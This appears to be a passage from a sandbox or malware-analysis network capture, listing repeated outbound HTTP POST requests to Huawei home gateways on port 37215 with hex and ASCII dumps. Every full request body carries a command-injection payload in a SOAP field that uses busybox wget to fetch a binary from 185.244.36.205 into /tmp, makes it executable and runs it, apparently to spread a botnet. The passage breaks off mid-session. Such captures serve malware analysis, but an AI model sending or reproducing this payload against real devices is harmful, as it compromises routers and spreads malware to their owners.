                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2077192.168.2.1548042181.168.73.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103868961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2078192.168.2.1548220157.40.23.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103919029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2079192.168.2.1541678121.171.214.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103919983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2080192.168.2.1550272190.139.244.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103926897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2081192.168.2.1547296121.59.205.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103930950 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2082192.168.2.1539198176.40.190.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103964090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2083192.168.2.1557522156.67.89.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103971004 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2084192.168.2.1543048121.244.196.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104006052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2085192.168.2.1533592197.206.162.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104042053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2086192.168.2.1552330190.30.141.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104055882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2087192.168.2.1539954121.176.212.10637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104084969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
